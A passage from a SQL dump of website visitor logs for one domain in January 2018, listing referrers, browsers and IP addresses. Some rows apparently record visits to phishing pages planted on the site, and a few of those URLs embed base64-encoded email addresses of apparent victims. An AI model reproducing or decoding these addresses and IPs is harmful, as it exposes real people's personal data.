E','Windows','9.0','','184.154.36.186','000',4,0),(16878,'2018-01-14','https://www.google.com/','Chrome','Macintosh','63.0.3239.132','','170.55.36.82','000',2,0),(16879,'2018-01-14','https://zphiblgz.org','MSIE','Windows','6.0','','104.42.198.99','000',1,0),(16880,'2018-01-14','https://www.google.com/','Safari','iPhone','11.0','','76.99.109.42','000',4,0),(16881,'2018-01-14','https://zphiblgz.org','Firefox','Windows','40.1','','103.38.177.180','000',2,0),(16882,'2018-01-14','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.78','000',1,0),(16883,'2018-01-14','https://zphiblgz.org','Firefox','Windows','40.1','','94.252.25.173','000',2,0),(16884,'2018-01-14','http://site.ru','Chrome','Windows','5.0.375.99','','69.49.117.152','000',1,0),(16885,'2018-01-14','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','73.213.27.103','000',3,0),(16886,'2018-01-14','https://zphiblgz.org','Firefox','Windows','27.0','','104.237.243.56','000',1,0),(16887,'2018-01-14','https://zphiblgz.org','Firefox','Windows','40.1','','75.66.144.221','000',2,0),(16888,'2018-01-14','https://www.google.co.jp/','Chrome','Windows','63.0.3239.132','','219.98.87.115','000',3,0),(16889,'2018-01-15','http://zphiblgz.org/','MSIE','Windows','6.0','','177.232.80.117','000',1,0),(16890,'2018-01-15','http://l.facebook.com/l.php?u=http%3A%2F%2Fzphiblgz.org%2F&h=ATM8bZBUnFVPrz0VBhfzdZIQC9XIY9ZVdb7mRlCO0_GYrMPMd5_aesW5-EKrPXRMdQSnyF2Mgpyd1sezZeVUD2ZiKqE6-iejQAg','AppleWebKit','iPhone','604.4.7','','71.114.37.67','000',5,0),(16891,'2018-01-15','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.44','000',1,0),(16892,'2018-01-15','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.72','000',2,0),(16893,'2018-01-15','https://zphiblgz.org','Safari','iPhone','11.0','','71.114.37.67','000',3,0),(16894,'2018-01-15','https://zphiblgz.org','Chrome','iPhone','63.0.3239.73','','71.114.37.67','000',3,0),(16895,'2018-01-15','http://www.dhcd.state.md.us/GIS/MMP/index.html','Safari','Macintosh','8.0.7','','71.114.37.67','000',3,0),(16896,'2018-01-15','https://zphiblgz.org','Firefox','Windows','40.1','','188.129.182.102','000',2,0),(16897,'2018-01-15','https://zphiblgz.org','Firefox','Windows','11.0','','144.76.71.83','000',2,0),(16898,'2018-01-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',2,0),(16899,'2018-01-15','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.28','000',1,0),(16900,'2018-01-15','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','195.22.125.82','000',2,0),(16901,'2018-01-15','http://uptime-as.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.157','000',1,0),(16902,'2018-01-15','http://zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.152','000',1,0),(16903,'2018-01-15','http://site.ru','Chrome','Windows','5.0.375.99','','82.165.35.158','000',1,0),(16904,'2018-01-15','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.32','000',1,0),(16905,'2018-01-15','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(16906,'2018-01-15','https://zphiblgz.org','Chrome','Windows','10.0.648.204','','209.95.165.28','000',2,0),(16907,'2018-01-15','https://www.google.com/','Safari','iPhone','11.0','','108.45.74.102','000',7,0),(16908,'2018-01-15','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','100.36.90.41','000',4,0),(16909,'2018-01-15','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.35','000',1,0),(16910,'2018-01-15','http://site.ru','Chrome','Windows','5.0.375.99','','91.234.32.188','000',2,0),(16911,'2018-01-15','https://zphiblgz.org','Firefox','Windows','57.0','','100.36.90.41','000',3,0),(16912,'2018-01-15','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.35','000',1,0),(16913,'2018-01-15','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.35','000',1,0),(16914,'2018-01-15','http://site.ru','Chrome','Windows','5.0.375.99','','66.175.44.58','000',2,0),(16915,'2018-01-15','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.29','000',1,0),(16916,'2018-01-15','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.31','000',1,0),(16917,'2018-01-15','http://site.ru','Chrome','Windows','5.0.375.99','','69.195.124.116','000',1,0),(16918,'2018-01-15','https://zphiblgz.org','Firefox','Windows','40.1','','112.135.10.128','000',2,0),(16919,'2018-01-15','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(16920,'2018-01-15','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(16921,'2018-01-15','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.32','000',1,0),(16922,'2018-01-15','http://zphiblgz.org','MSIE','Windows','9.0','','107.178.194.102','000',1,0),(16923,'2018-01-15','http://www.bing.com','MSIE','Windows','8.0','','204.13.201.139','000',2,0),(16924,'2018-01-15','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.150','000',2,0),(16925,'2018-01-15','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',5,0),(16926,'2018-01-15','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','31.168.158.239','000',4,0),(16927,'2018-01-15','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.158','000',2,0),(16928,'2018-01-15','https://zphiblgz.org','MSIE','Windows','9.0','','173.205.33.17','000',1,0),(16929,'2018-01-15','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.1','000',5,0),(16930,'2018-01-15','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','73.129.22.251','000',8,0),(16931,'2018-01-15','https://zphiblgz.org','Firefox','Windows','40.1','','121.217.40.237','000',2,0),(16932,'2018-01-15','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.229.65','000',2,0),(16933,'2018-01-15','https://zphiblgz.org','MSIE','Windows','8.0','','50.19.154.226','000',2,0),(16934,'2018-01-15','http://zphiblgz.org/','Firefox','Windows','52.0','','37.113.12.166','000',2,0),(16935,'2018-01-15','https://www.google.com/','Chrome','Windows','63.0.3239.132','','68.134.8.97','000',5,0),(16936,'2018-01-15','https://www.google.com/','Edge','Windows','15.15063','','68.105.150.92','000',1,0),(16937,'2018-01-15','https://www.google.com/','Safari','iPhone','11.0','','69.85.61.38','000',2,0),(16938,'2018-01-15','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',6,0),(16939,'2018-01-15','https://zphiblgz.org/service/','AppleWebKit','Windows','534','','40.77.177.113','000',2,0),(16940,'2018-01-15','http://zphiblgz.org/','Firefox','Windows','50.0','','188.165.4.128','000',2,0),(16941,'2018-01-15','https://www.google.com/','Chrome','Windows','63.0.3239.132','','99.46.10.55','000',5,0),(16942,'2018-01-15','https://zphiblgz.org','Firefox','Windows','40.1','','112.210.128.18','000',2,0),(16943,'2018-01-15','https://zphiblgz.org','MSIE','Windows','10.0','','118.219.252.37','000',2,0),(16944,'2018-01-15','http://zphiblgz.org','MSIE','Windows','9.0','','107.178.195.144','000',1,0),(16945,'2018-01-15','https://zphiblgz.org','Chrome','Windows','7.0.517.44','','118.219.252.37','000',2,0),(16946,'2018-01-15','https://zphiblgz.org','Firefox','Windows','3.6.8','','118.219.252.37','000',2,0),(16947,'2018-01-15','https://zphiblgz.org','Opera','Windows','10.62','','118.219.252.37','000',2,0),(16948,'2018-01-15','https://zphiblgz.org','AppleWebkit','Android','528.5','','118.219.252.37','000',2,0),(16949,'2018-01-15','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.176','000',2,0),(16950,'2018-01-15','https://zphiblgz.org','MSIE','Windows','9.0','','173.205.33.24','000',1,0),(16951,'2018-01-15','https://www.google.com/','Chrome','Android','63.0.3239.111','','172.11.254.62','000',3,0),(16952,'2018-01-16','https://www.google.co.jp/','Chrome','Android','63.0.3239.111','','182.251.252.7','000',2,0),(16953,'2018-01-16','http://zphiblgz.org/idc/login/malnutrition585micrographically9990/','Chrome','Android','63.0.3239.111','','106.130.43.205','000',1,0),(16954,'2018-01-16','https://zphiblgz.org','Android Browser','Android','4.0','','182.251.252.7','000',3,0),(16955,'2018-01-16','http://zphiblgz.org/idc/login/malnutrition585micrographically9990/','Android Browser','Android','4.0','','106.130.43.205','000',1,0),(16956,'2018-01-16','https://zphiblgz.org/mailbox/boxMrenewal.php?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=ay5lbHZpbkBtYWl6by5jb20=&.rand=13InboxLight.aspx?n=1774256418&fid=4','MSIE','Windows','10.0','','51.15.189.90','000',1,0),(16957,'2018-01-16','https://zphiblgz.org/mailbox/loading.php?Email=&.rand=13InboxLight.aspx?n=1774256418&fid=4','MSIE','Windows','10.0','','196.54.55.21','000',1,0),(16958,'2018-01-16','https://zphiblgz.org/mailbox/boxMe.php','MSIE','Windows','10.0','','79.73.71.162','000',1,0),(16959,'2018-01-16','https://zphiblgz.org/mailbox/boxMe.php?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=&.rand=13InboxLight.aspx?n=1774256418&fid=4','MSIE','Windows','10.0','','84.51.165.121','000',3,0),(16960,'2018-01-16','https://zphiblgz.org/mailbox/boxMrenewal.php?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=eWlxYmFsQGVtYWFyLmFl&.rand=13InboxLight.aspx?n=1774256418&fid=4','Chrome','Windows','56.0.2924.87','','84.51.165.121','000',1,0),(16961,'2018-01-16','https://zphiblgz.org/mailbox/boxMrenewal.php?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=eWlxYmFsQGVtYWFyLmFl&.rand=13InboxLight.aspx?n=1774256418&fid=4','Edge','Windows','14.14393','','176.126.245.14','000',1,0),(16962,'2018-01-16','https://zphiblgz.org/mailbox/boxMrenewal.php?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=eWlxYmFsQGVtYWFyLmFl&.rand=13InboxLight.aspx?n=1774256418&fid=4','Edge','Windows','14.14393','','185.220.101.30','000',1,0),(16963,'2018-01-16','https://zphiblgz.org','Java','Unknown','1.6.0','','69.164.111.198','000',27,0),(16964,'2018-01-16','https://zphiblgz.org/cache/v12/get_started/','MSIE','Windows','10.0','','196.52.84.41','000',1,0),(16965,'2018-01-16','https://zphiblgz.org/cache/v12/','MSIE','Windows','10.0','','173.239.212.42','000',1,0),(16966,'2018-01-16','https://zphiblgz.org/cache/v12/index.php','MSIE','Windows','10.0','','185.220.101.29','000',2,0),(16967,'2018-01-16','https://zphiblgz.org/cache/v12/index.php','Edge','Windows','14.14393','','84.51.165.121','000',1,0),(16968,'2018-01-16','https://zphiblgz.org/cache/v12/index.php','Edge','Windows','14.14393','','165.227.0.128','000',1,0),(16969,'2018-01-16','https://zphiblgz.org/cache/v12/index.php','Chrome','Windows','56.0.2924.87','','31.185.27.201','000',1,0),(16970,'2018-01-16','https://zphiblgz.org/cache/v12/get_started/index.php','Safari','iPhone','7.0','','79.73.66.217','000',1,0),(16971,'2018-01-16','https://zphiblgz.org/cache/v12/get_started/index.php','Safari','iPhone','7.0','','173.239.212.42','000',1,0),(16972,'2018-01-16','https://zphiblgz.org','Firefox','Linux','24.0','','88.198.22.8','000',2,0),(16973,'2018-01-16','https://www.google.com/','Edge','Windows','14.14393','','75.137.255.106','000',2,0),(16974,'2018-01-16','http://zphiblgz.org','Firefox','Windows','3.6.8','','89.234.68.70','000',10,0),(16975,'2018-01-16','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','5.15.46.252','000',3,0),(16976,'2018-01-16','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.130.127','000',2,0),(16977,'2018-01-16','http://site.ru','Chrome','Windows','5.0.375.99','','195.34.83.83','000',1,0),(16978,'2018-01-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',3,0),(16979,'2018-01-16','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1668._R6C9vIpAgq1udzJUdxYT-2z_Krplju_dCdJmUwvkCBNVnFF579Xmfb8KMC2K6ME.8161bcde80601db00ed1c1c9c8a6cfd9933e3b8b&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YL_nDC5hqtEQ6WayFoZKRZE&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSmdzTXozRlNuWUxkU3FoUDBxRl9vSm1qV3IxWjA2a0g3aWEtdndxbDA5eHB3eEtNUXdYWTlZSDdUemVQb0t3bEJrc1lGWE5lVnBfWXJWX3ZNM1ZacEFzSWtiaHdyTldZUlF3blYyUk9oTzZBVXNpWmdqT1dhMWgyZWt2cmUzYUE1bVdJTU9XVTBmZGtqWDdNbVBiWm55emt1Vk8xa1JTSlFEYnhHU0pqOUNCSlFnZUR3ZjVhcTRmS2RnTUNjYVk4WDJrZGdDaWFpdVJ1UmsyUTNFV0owUg&b64e=2&sign=bb081361796cd4353c7b208eab426e90&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQSaYtyyri96FQYUfUVsqxhkzfDseAWB9Qw7E51I5aNeesWiXkLrgZgBkumSCILkwoR02XS0nXS3xutEQrrba4je5wJv_PYbkc-Y-4SQ56DKOaAanYQTwgg_YzDh8y9knDHYus6nv7o0Y&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXEfKO1imoOE3f6-PFhA8BX45O6vcJ1mEMqpxYHrmAFRM2SPsF_tkNeP5TMD6Y8tOaCDGlfZ47eUg&l10n=ru&cts=1516096893112&mc=2.71137557568','MSIE','Windows','8.0','','95.220.99.152','000',1,0),(16980,'2018-01-16','http://site.ru','Chrome','Windows','5.0.375.99','','85.128.142.69','000',2,0),(16981,'2018-01-16','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','195.22.125.82','000',2,0),(16982,'2018-01-16','https://www.google.com/','Chrome','Windows','62.0.3202.94','','162.99.237.3','000',4,0),(16983,'2018-01-16','https://zphiblgz.org','Safari','iPhone','11.0','','50.225.39.88','000',6,0),(16984,'2018-01-16','https://zphiblgz.org','MSIE','Windows','9.0','','173.205.33.20','000',1,0),(16985,'2018-01-16','https://zphiblgz.org','Safari','iPhone','11.0','','71.179.11.101','000',3,0),(16986,'2018-01-16','https://www.google.com/','Chrome','Windows','49.0.2623.112','','24.44.207.0','000',2,0),(16987,'2018-01-16','http://www.bing.com/search?q=amazon','MSIE','Windows','8.0','','70.42.131.170','000',2,0),(16988,'2018-01-16','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.35','000',1,0),(16989,'2018-01-16','https://www.google.com/','SamsungBrowser','Android','6.2','','107.77.233.232','000',2,0),(16990,'2018-01-16','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.78','000',1,0),(16991,'2018-01-16','https://zphiblgz.org','SamsungBrowser','Android','2.1','','107.77.196.227','000',3,0),(16992,'2018-01-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.210','000',1,0),(16993,'2018-01-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.151','000',1,0),(16994,'2018-01-16','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.72','000',1,0),(16995,'2018-01-16','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.54.42','000',2,0),(16996,'2018-01-16','https://www.google.com/','SamsungBrowser','Android','6.2','','172.56.28.27','000',2,0),(16997,'2018-01-16','http://site.ru','Chrome','Windows','5.0.375.99','','213.136.89.208','000',1,0),(16998,'2018-01-16','http://site.ru','Chrome','Windows','5.0.375.99','','66.147.244.173','000',2,0),(16999,'2018-01-16','android-app://com.google.android.googlequicksearchbox','Chrome','Android','63.0.3239.111','','96.68.224.41','000',4,0),(17000,'2018-01-16','https://zphiblgz.org','Chrome','Android','61.0.3163.98','','66.87.133.222','000',1,0),(17001,'2018-01-16','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1668._hU1nXCq-aVJCr9qZije1kjJtPZ8YG04yRipSYVWDAc8QJcCEfn_BktR5mfg_0aZ.19881f81e526155c2acc3f2d704df2383aab91c8&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YLeQVNu7TCjFWhspMNrg36Y&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIVlE5M1MxRWZoT3pYVl9NVlE3emFyclBSRzl1NnlJX0psMmJwRjNWLW9DRl9IcE1IY3AtSUx1&b64e=2&sign=a9a51b677497534b0ddd37221ac6f282&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQXbYQp9t5VF6ndTdw9URZFqWd4OBPlgRxv19i87vCeQmmQmeUHcv4P2Ymd3HB_Z0itEzEUXUj-z0QEEIbnVmIaTfGd-iRoVfdKoWYvXMfsuyIbZ90-Tiopy3T_lHgTxNfge-MNllX6M6&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXboeqr305aINOjn7yDVnp4n8N--a_zuVx82vF3fiwsIxIaqK5BrNIHnXBHHReOKtCQPRqSwob3EQ&l10n=ru&cts=1516122744468&mc=1.97847703593','Chrome','Windows','56.0.2924.92','','109.173.58.56','000',1,0),(17002,'2018-01-16','http://site.ru','Chrome','Windows','5.0.375.99','','185.43.220.9','000',1,0),(17003,'2018-01-16','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.32','000',1,0),(17004,'2018-01-16','https://www.google.com/','Chrome','Windows','63.0.3239.132','','64.56.91.47','000',2,0),(17005,'2018-01-16','https://www.google.com/','Safari','iPhone','11.0','','71.176.44.20','000',1,0),(17006,'2018-01-16','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','178.255.86.1','000',3,0),(17007,'2018-01-16','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwj87ceKmt3YAhWOMd8KHeT0ATAQjBAILzAB&url=https%3A%2F%2Fzphiblgz.org%2Fhistory%2F&usg=AOvVaw05fj4GXF94hngtHbEOqcqi','MSIE','Windows','11.0','','140.108.1.11','000',3,0),(17008,'2018-01-16','http://uptime-as.net/zphiblgz.org','Unknown','Unknown','Unknown','','142.234.115.154','000',1,0),(17009,'2018-01-16','http://zphiblgz.org','Unknown','Unknown','Unknown','','142.234.115.155','000',1,0),(17010,'2018-01-16','https://zphiblgz.org','Safari','iPhone','11.0','','108.196.94.61','000',3,0),(17011,'2018-01-16','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','73.129.22.251','000',5,0),(17012,'2018-01-16','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.31','000',1,0),(17013,'2018-01-16','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.29','000',1,0),(17014,'2018-01-16','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(17015,'2018-01-16','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',5,0),(17016,'2018-01-16','https://www.google.com/','SamsungBrowser','Android','6.2','','174.218.146.75','000',2,0),(17017,'2018-01-16','https://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&cad=rja&uact=8&ved=0ahUKEwjQrp3WsN3YAhVIb60KHVJZD10QjRwIBw&url=https%3A%2F%2Fzphiblgz.org%2Fhistory%2F&psig=AOvVaw3hnaxqfiZh4KTCh2NLm0Zo&ust=1516222910345397','Firefox','Windows','35.0','','99.177.119.66','000',1,0),(17018,'2018-01-16','https://www.google.com/','Safari','iPhone','11.0','','204.126.132.241','000',2,0),(17019,'2018-01-16','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.31','000',1,0),(17020,'2018-01-16','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.31','000',1,0),(17021,'2018-01-16','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.27','000',1,0),(17022,'2018-01-16','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.27','000',1,0),(17023,'2018-01-16','https://zphiblgz.org','Chrome','Linux','26.0.1410.63','','80.211.148.133','000',1,0),(17024,'2018-01-16','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.29','000',1,0),(17025,'2018-01-16','https://zphiblgz.org','Chrome','Windows','26.0.1410.58','','5.9.17.118','000',1,0),(17026,'2018-01-16','https://zphiblgz.org','Firefox','Windows','40.1','','179.98.5.19','000',2,0),(17027,'2018-01-16','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.27','000',1,0),(17028,'2018-01-16','https://zphiblgz.org','Safari','iPhone','7.0','','199.30.24.36','000',1,0),(17029,'2018-01-16','http://burger-imperia.com/','Chrome','Linux','37.0.2062.120','','62.210.129.246','000',2,0),(17030,'2018-01-16','https://www.google.com/','Chrome','Android','56.0.2924.87','','24.142.195.34','000',2,0),(17031,'2018-01-16','https://zphiblgz.org','Firefox','Windows','40.1','','93.113.170.156','000',2,0),(17032,'2018-01-16','https://search.yahoo.com/','Chrome','Windows','63.0.3239.132','','68.134.61.12','000',8,0),(17033,'2018-01-16','https://zphiblgz.org','Safari','iPhone','7.0','','65.55.210.137','000',1,0),(17034,'2018-01-16','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.29','000',1,0),(17035,'2018-01-16','https://www.google.com/','Chrome','Android','63.0.3239.111','','172.11.254.62','000',2,0),(17036,'2018-01-16','http://www.google.com/','Chrome','Android','63.0.3239.111','','73.39.129.215','000',11,0),(17037,'2018-01-16','https://www.google.com/','Safari','iPad','11.0','','98.164.164.136','000',3,0),(17038,'2018-01-16','https://zphiblgz.org','Safari','iPhone','11.0','','108.45.36.63','000',5,0),(17039,'2018-01-16','https://www.google.com/','Safari','iPhone','604.1','','76.78.70.46','000',4,0),(17040,'2018-01-16','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','13.67.141.98','000',1,0),(17041,'2018-01-16','https://www.google.com/','SamsungBrowser','Android','6.2','','73.76.145.164','000',4,0),(17042,'2018-01-16','https://www.google.com/','Safari','iPhone','11.0','','108.31.60.119','000',2,0),(17043,'2018-01-17','http://site.ru','Chrome','Windows','5.0.375.99','','185.132.240.248','000',3,0),(17044,'2018-01-17','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.30','000',1,0),(17045,'2018-01-17','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',2,0),(17046,'2018-01-17','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.32','000',1,0),(17047,'2018-01-17','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.29','000',1,0),(17048,'2018-01-17','http://www.zphiblgz.org','Chrome','Macintosh','58.0.3029.110','','104.192.74.41','000',28,0),(17049,'2018-01-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','104.192.74.41','000',24,0),(17050,'2018-01-17','http://zphiblgz.org/','Opera','Windows','12.16','','195.22.127.67','000',3,0),(17051,'2018-01-17','http://site.ru','Chrome','Windows','5.0.375.99','','69.195.122.220','000',2,0),(17052,'2018-01-17','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.31','000',1,0),(17053,'2018-01-17','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.31','000',1,0),(17054,'2018-01-17','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.28','000',1,0),(17055,'2018-01-17','https://zphiblgz.org','MSIE','Windows','6.0','','104.42.198.99','000',3,0),(17056,'2018-01-17','http://site.ru','Chrome','Windows','5.0.375.99','','205.134.252.186','000',2,0),(17057,'2018-01-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',2,0),(17058,'2018-01-17','http://site.ru','Chrome','Windows','5.0.375.99','','97.79.236.171','000',1,0),(17059,'2018-01-17','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.86','000',1,0),(17060,'2018-01-17','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.80','000',1,0),(17061,'2018-01-17','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(17062,'2018-01-17','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.96','000',1,0),(17063,'2018-01-17','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.104','000',1,0),(17064,'2018-01-17','https://zphiblgz.org','Safari','Macintosh','11.0.2','','166.91.10.210','000',5,0),(17065,'2018-01-17','http://www.bing.com/search?q=amazon','MSIE','Windows','8.0','','70.42.131.170','000',2,0),(17066,'2018-01-17','https://zphiblgz.org','Firefox','Windows','40.1','','222.165.116.178','000',2,0),(17067,'2018-01-17','http://search.yahoo.co.jp/','MSIE','Windows','11.0','','119.104.156.53','000',1,0),(17068,'2018-01-17','https://zphiblgz.org','curl','Unknown','7.35.0','','130.211.244.175','000',5,0),(17069,'2018-01-17','http://site.ru','Chrome','Windows','5.0.375.99','','66.147.242.99','000',2,0),(17070,'2018-01-17','https://www.google.com/','Chrome','Macintosh','63.0.3239.132','','24.53.78.198','000',1,0),(17071,'2018-01-17','https://www.google.com/','Safari','Macintosh','11.0.2','','71.179.81.192','000',8,0),(17072,'2018-01-17','http://site.ru','Chrome','Windows','5.0.375.99','','95.175.32.10','000',1,0),(17073,'2018-01-17','https://zphiblgz.org','Firefox','Windows','40.1','','197.225.210.187','000',2,0),(17074,'2018-01-17','http://site.ru','Chrome','Windows','5.0.375.99','','184.168.200.161','000',2,0),(17075,'2018-01-17','http://site.ru','Chrome','Windows','5.0.375.99','','178.210.90.90','000',3,0),(17076,'2018-01-17','http://site.ru','Chrome','Windows','5.0.375.99','','95.170.70.25','000',1,0),(17077,'2018-01-17','https://www.google.com/','Chrome','Windows','63.0.3239.132','','208.83.121.42','000',13,0),(17078,'2018-01-17','https://zphiblgz.org','Python-urllib','Unknown','2.7','','104.131.254.50','000',1,0),(17079,'2018-01-17','zphiblgz.org','Chrome','Windows','50.0.2661.75','','170.210.156.91','000',1,0),(17080,'2018-01-17','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(17081,'2018-01-17','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.29','000',1,0),(17082,'2018-01-17','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.32','000',1,0),(17083,'2018-01-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','81.169.144.135','000',1,0),(17084,'2018-01-17','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.32','000',1,0),(17085,'2018-01-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','176.53.63.50','000',1,0),(17086,'2018-01-17','http://site.ru','Chrome','Windows','5.0.375.99','','64.71.32.35','000',2,0),(17087,'2018-01-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','74.220.215.216','000',1,0),(17088,'2018-01-17','https://zphiblgz.org','Chrome','Windows','57.0.2987.112','','12.231.215.110','000',5,0),(17089,'2018-01-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','119.31.233.98','000',1,0),(17090,'2018-01-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','207.246.249.200','000',1,0),(17091,'2018-01-17','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.229.65','000',2,0),(17092,'2018-01-17','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(17093,'2018-01-17','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.29','000',1,0),(17094,'2018-01-17','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.29','000',1,0),(17095,'2018-01-17','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',2,0),(17096,'2018-01-17','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','100.36.84.244','000',17,0),(17097,'2018-01-17','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','73.213.165.89','000',6,0),(17098,'2018-01-17','http://uptime-eu.net/zphiblgz.org','Unknown','Unknown','Unknown','','37.72.175.115','000',1,0),(17099,'2018-01-17','http://uptime-us.net/zphiblgz.org','Unknown','Unknown','Unknown','','37.72.175.119','000',1,0),(17100,'2018-01-17','http://zphiblgz.org','Unknown','Unknown','Unknown','','37.72.175.120','000',1,0),(17101,'2018-01-17','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.31','000',1,0),(17102,'2018-01-17','https://www.google.com/','Safari','Macintosh','9.1.2','','76.100.200.217','000',4,0),(17103,'2018-01-17','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.29','000',1,0),(17104,'2018-01-17','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','68.33.93.252','000',6,0),(17105,'2018-01-17','https://zphiblgz.org','Firefox','Linux','11.0'